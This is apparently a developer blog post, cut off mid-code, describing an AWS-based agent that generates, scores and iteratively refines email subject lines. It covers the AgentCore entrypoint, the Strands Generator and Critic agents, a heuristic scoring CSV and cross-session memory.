&lt;p&gt;Next week you run a cross-sell campaign for the same brand. The briefing is different but the session ID carries your name. Before generating a single candidate, the optimizer reads what it learned from your prior sessions: urgency-led lines consistently underperformed for this brand; premium and exclusivity framing reached the shortlist every time. Round one already looks different from what a first-time user would see.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6rsgbv313uyttm6srsnf.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6rsgbv313uyttm6srsnf.png" alt=" " width="772" height="544"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h3&gt;
  
  
  Input: a campaign briefing
&lt;/h3&gt;

&lt;p&gt;A generic JSON brief with the objective, audience, offer, brand voice and constraints. The kind of structure you'd find in any agency template, nothing platform-specific.&lt;/p&gt;
&lt;h3&gt;
  
  
  Output: a ranked shortlist of 5
&lt;/h3&gt;

&lt;p&gt;Each variant comes with predicted open-rate range, the dimensions where it scored highest and any flagged risks (spam triggers, length penalty, audience mismatch). The user can ask for follow-ups in the same session — "give me shorter versions of #2 and #4" — and the agent refines while preserving what made those variants score well.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fapgqacprpqx7n821g8s2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fapgqacprpqx7n821g8s2.png" alt="UI mockup" width="800" height="492"&gt;&lt;/a&gt;&lt;/p&gt;


&lt;h2&gt;
  
  
  Drafting a solution
&lt;/h2&gt;

&lt;p&gt;Three tiers, top to bottom.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9ge20upo4kuaq76rg2i4.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9ge20upo4kuaq76rg2i4.png" alt=" " width="800" height="612"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The caller sends a campaign briefing JSON and gets a streamed response back. That exchange happens through a single &lt;code&gt;@app.entrypoint&lt;/code&gt; function inside AgentCore Runtime, a managed AWS service that handles the HTTP transport, session lifecycle, and streaming framing so the agent code doesn't have to.&lt;/p&gt;

&lt;p&gt;Inside the Runtime, the architecture splits into two layers. The &lt;strong&gt;imperative shell&lt;/strong&gt; (&lt;code&gt;agent/builder.py&lt;/code&gt;) owns everything that touches a framework: two Strands agents (Generator and Critic), an in-process scorer, and a memory recall helper. It wires these into four plain Python callables and injects them into the &lt;strong&gt;functional core&lt;/strong&gt; (&lt;code&gt;agent/iteration.py&lt;/code&gt;). The core runs the generate/score/critique/regenerate loop and returns a ranked shortlist.&lt;/p&gt;

&lt;p&gt;At the bottom, two managed AWS services sit off the request path. Bedrock serves every LLM call via Strands' &lt;code&gt;BedrockModel&lt;/code&gt;. AgentCore Memory receives session events automatically from the Strands session manager, and returns extracted patterns when the loop asks for them at the start of each run. The async strategy extraction that makes cross-session learning possible runs roughly 60 seconds after each session ends.&lt;/p&gt;


&lt;h2&gt;
  
  
  I. The entrypoint (main.py)
&lt;/h2&gt;

&lt;p&gt;The entrypoint has one job: receive a campaign briefing, run the optimization loop and stream results back as they arrive.&lt;/p&gt;

&lt;p&gt;AgentCore Runtime gives you this as a single decorator. You don't write a router, configure middleware or manage a server process; instead, you hand it an async generator and it handles the rest: HTTP transport, session lifecycle, streaming framing, &lt;code&gt;session_id&lt;/code&gt; and &lt;code&gt;user_id&lt;/code&gt; extraction from request headers.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;app&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;BedrockAgentCoreApp&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

&lt;span class="nd"&gt;@app.entrypoint&lt;/span&gt;
&lt;span class="k"&gt;async&lt;/span&gt; &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;invoke&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;payload&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;context&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="n"&gt;session_id&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;getattr&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;context&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;session_id&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="bp"&gt;None&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="ow"&gt;or&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;default-session&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
    &lt;span class="n"&gt;user_id&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;getattr&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;context&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;user_id&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="bp"&gt;None&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="ow"&gt;or&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;default-user&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
    &lt;span class="k"&gt;try&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="n"&gt;briefing&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;validate_briefing&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;payload&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;prompt&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="ow"&gt;or&lt;/span&gt; &lt;span class="sh"&gt;""&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="nf"&gt;except &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;ValueError&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;json&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;JSONDecodeError&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;exc&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;yield&lt;/span&gt; &lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Invalid briefing: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;exc&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt;

    &lt;span class="n"&gt;result&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;run_initial_optimization&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;briefing&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;session_id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;user_id&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;round_log&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;result&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;rounds&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;line&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="nf"&gt;_format_round_lines&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;round_log&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
            &lt;span class="k"&gt;yield&lt;/span&gt; &lt;span class="n"&gt;line&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
    &lt;span class="k"&gt;yield&lt;/span&gt; &lt;span class="nf"&gt;_format_shortlist&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;result&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
    &lt;span class="k"&gt;yield&lt;/span&gt; &lt;span class="n"&gt;json&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;dumps&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nf"&gt;_serialize_result&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;result&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="n"&gt;ensure_ascii&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="bp"&gt;False&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Every &lt;code&gt;yield&lt;/code&gt; sends a chunk to the caller immediately. This matters because an optimization run takes from 30 to 90 seconds and the caller sees each round's scores as they complete, not a blank screen followed by a wall of text.&lt;/p&gt;

&lt;p&gt;Refinement works by re-submitting a modified briefing with the same &lt;code&gt;session_id&lt;/code&gt; — with, for example, a tighter length constraint, different brand voice or added avoid-words. AgentCore Memory carries learned patterns from prior sessions forward automatically; the entrypoint doesn't need to know about that.&lt;/p&gt;




&lt;h2&gt;
  
  
  II. The imperative shell (agent/builder.py)
&lt;/h2&gt;

&lt;p&gt;The shell is the wiring layer. It knows about Strands, AgentCore and Bedrock while the functional core doesn't (it receives callables). The shell is what turns those framework dependencies into plain Python functions the core can call without importing anything.&lt;/p&gt;

&lt;p&gt;Four things live here: a generator agent, a critic agent, an in-process scorer and a memory recall helper. At the start of each optimization run, all four get injected into the loop as callables.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;run_initial_optimization&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;briefing&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;session_id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;user_id&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="n"&gt;generator&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;_make_agent&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;session_id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;user_id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;GENERATOR_SYSTEM_PROMPT&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;critic&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;_make_agent&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;session_id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;user_id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;CRITIQUE_SYSTEM_PROMPT&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;generate&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;prompt&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;_n&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nf"&gt;_strip_json_array&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nf"&gt;str&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nf"&gt;generator&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;prompt&lt;/span&gt;&lt;span class="p"&gt;)))&lt;/span&gt;

    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;critique&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;scored&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;to_drop&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nf"&gt;str&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nf"&gt;critic&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nf"&gt;build_critique_prompt&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;scored&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;to_drop&lt;/span&gt;&lt;span class="p"&gt;))).&lt;/span&gt;&lt;span class="nf"&gt;strip&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nf"&gt;run_optimization&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
        &lt;span class="n"&gt;briefing&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="n"&gt;generate&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;generate&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="n"&gt;score&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;score_candidates&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="n"&gt;critique&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;critique&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="n"&gt;recall&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;recall_for_user&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="n"&gt;on_round&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;_emit_round_telemetry&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="n"&gt;actor_id&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;user_id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="n"&gt;round_one_prompt_builder&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;round_one_prompt&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="n"&gt;regenerate_prompt_builder&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;regenerate_prompt&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  The agents
&lt;/h3&gt;

&lt;p&gt;Generator and Critic are separate Strands &lt;code&gt;Agent&lt;/code&gt; instances with separate system prompts. The generator is told to produce strict JSON arrays of strings and nothing else. The critic is told to produce two to four sentences of explicit, actionable guidance.&lt;/p&gt;

&lt;p&gt;Both share the same &lt;code&gt;AgentCoreMemorySessionManager&lt;/code&gt;, so they write to the same session namespace and see the same conversation history.&lt;/p&gt;

&lt;h3&gt;
  
  
  Scoring stays in-process
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;score_candidates&lt;/code&gt; is not an agent and not a service call — it's a direct import of &lt;code&gt;score_subject_line&lt;/code&gt; from &lt;code&gt;scoring/score.py&lt;/code&gt;, with the heuristic rules loaded once. No network, no latency, no failure mode beyond a bad CSV row.&lt;/p&gt;

&lt;h3&gt;
  
  
  The observability hook
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;on_round=_emit_round_telemetry&lt;/code&gt; is the last injection. After each completed round, the loop calls it with a &lt;code&gt;RoundLog&lt;/code&gt;. The shell opens an OpenTelemetry span, records seven attributes (round number, candidate count, top score, top subject line, guidance excerpt), closes the span and emits a structured log line.&lt;/p&gt;




&lt;h2&gt;
  
  
  III. The functional core (agent/iteration.py)
&lt;/h2&gt;

&lt;p&gt;Keeping the loop free of framework imports means it can be read, tested and reasoned about without knowing anything about the surrounding infrastructure. You can swap the LLM, replace the scoring backend or drop AgentCore entirely and the loop doesn't change. The entire contract is in the signature:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;run_optimization&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="n"&gt;briefing&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;Any&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;generate&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;Callable&lt;/span&gt;&lt;span class="p"&gt;[[&lt;/span&gt;&lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;int&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="nb"&gt;list&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;]],&lt;/span&gt;
    &lt;span class="n"&gt;score&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;Callable&lt;/span&gt;&lt;span class="p"&gt;[[&lt;/span&gt;&lt;span class="nb"&gt;list&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="n"&gt;Any&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="nb"&gt;list&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nb"&gt;dict&lt;/span&gt;&lt;span class="p"&gt;]],&lt;/span&gt;
    &lt;span class="n"&gt;critique&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;Callable&lt;/span&gt;&lt;span class="p"&gt;[[&lt;/span&gt;&lt;span class="nb"&gt;list&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nb"&gt;dict&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="nb"&gt;list&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nb"&gt;dict&lt;/span&gt;&lt;span class="p"&gt;]],&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt;
    &lt;span class="n"&gt;recall&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;Callable&lt;/span&gt;&lt;span class="p"&gt;[[&lt;/span&gt;&lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;Any&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="n"&gt;MemoryContext&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;|&lt;/span&gt; &lt;span class="bp"&gt;None&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="bp"&gt;None&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;on_round&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;Callable&lt;/span&gt;&lt;span class="p"&gt;[[&lt;/span&gt;&lt;span class="n"&gt;RoundLog&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="bp"&gt;None&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;|&lt;/span&gt; &lt;span class="bp"&gt;None&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="bp"&gt;None&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;actor_id&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;anonymous&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;max_rounds&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;int&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;4&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;plateau_epsilon&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;float&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mf"&gt;0.5&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;round_one_prompt_builder&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;...,&lt;/span&gt;
    &lt;span class="n"&gt;regenerate_prompt_builder&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;...,&lt;/span&gt;
&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;IterationResult&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Round one generates eight candidates across eight archetypes and scores them all. Each subsequent round generates only the slots vacated by pruning. New and surviving candidates are merged, deduped by subject line and sorted by score.&lt;/p&gt;

&lt;p&gt;After sorting, the loop checks whether the top-3 average improved by at least &lt;code&gt;plateau_epsilon&lt;/code&gt; points over the prior round. If not, the scores have converged and the loop stops early to avoid wasting LLM calls.&lt;/p&gt;

&lt;p&gt;If there's still room to improve and rounds remain, the bottom 40% are pruned and handed to the critic. The critic explains what patterns made them lose in two to four sentences, referencing specific signals. That guidance feeds into the next round's regeneration prompt.&lt;/p&gt;

&lt;p&gt;After at most four rounds, the loop returns the top five candidates with the full per-round log and the memory context read at the start.&lt;/p&gt;




&lt;h2&gt;
  
  
  IV. Scoring
&lt;/h2&gt;

&lt;p&gt;Every candidate produced by the generator gets a score before the loop decides what to keep and what to prune. The scorer runs 45 heuristics against each subject line and returns a composite score between 0 and 100, a predicted open-rate band, per-dimension breakdowns and an explanation of the top contributions. They're stored in a simple CSV and cover 9 dimensions: length, urgency, spam risk, curiosity triggers, value signals, personalization, style, audience fit and brand voice.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;A heuristic is not a rule.&lt;/strong&gt; A rule is binary — pass or fail, always. A heuristic is a signal that contributes positively or negatively to a score based on what the literature says tends to correlate with open rates. "Subject lines between 30 and 50 characters score better" is an empirical observation, not a constraint.&lt;/p&gt;

&lt;p&gt;The same urgency words that lift acquisition open rates by +1.0 point hurt retention campaigns by −2.0 and are inappropriate for regulatory notices at −5.0. The &lt;code&gt;audience_modifier&lt;/code&gt; column captures that context-dependence per rule; audience tags are inferred automatically from briefing free-text.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;rule_id,category,pattern,match_type,weight,audience_modifier
LEN_SWEET_SPOT_30_50,length,30-50,range,8.0,,
URGENCY_BASE_LIFT,urgency,urgent|hurry|now|today,word_any,3.5,acquisition:+1.0;retention:-2.0;regulatory:-5.0
SPAM_TRIGGER_FREE,spam_risk,free|100% free,word_any,-6.0,,
VALUE_FREE_SHIPPING,value_signals,free shipping,phrase,4.0,acquisition:+1.0
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;blockquote&gt;
&lt;p&gt;These weights are starting points. A real company would probably use a model trained on their own send history or something similar.&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  V. The two agents and Bedrock
&lt;/h2&gt;

&lt;p&gt;The Generator and Critic share a model and a session manager but have nothing else in common.&lt;/p&gt;

&lt;p&gt;Both agents are Strands &lt;code&gt;Agent&lt;/code&gt; instances backed by &lt;strong&gt;Amazon Nova 2 Lite&lt;/strong&gt;, invoked via Bedrock's cross-region inference profile. Both are wired to &lt;code&gt;AgentCoreMemorySessionManager&lt;/code&gt;, which writes each turn as a session event automatically. Neither agent needs to know about memory because the session manager handles it transparently.&lt;/p&gt;

&lt;p&gt;The Generator enforces its output shape through Strands' structured output support rather than prompt engineering. Instead of instructing the model to "output strict JSON arrays only" and then parsing whatever it produces, you pass a Pydantic schema to the agent call and Bedrock enforces it at the model level:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="k"&gt;class&lt;/span&gt; &lt;span class="nc"&gt;SubjectLineList&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;BaseModel&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="n"&gt;subject_lines&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;list&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;Field&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
        &lt;span class="n"&gt;description&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Email subject line candidates, one per requested slot.&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
    &lt;span class="p"&gt;)&lt;/span&gt;

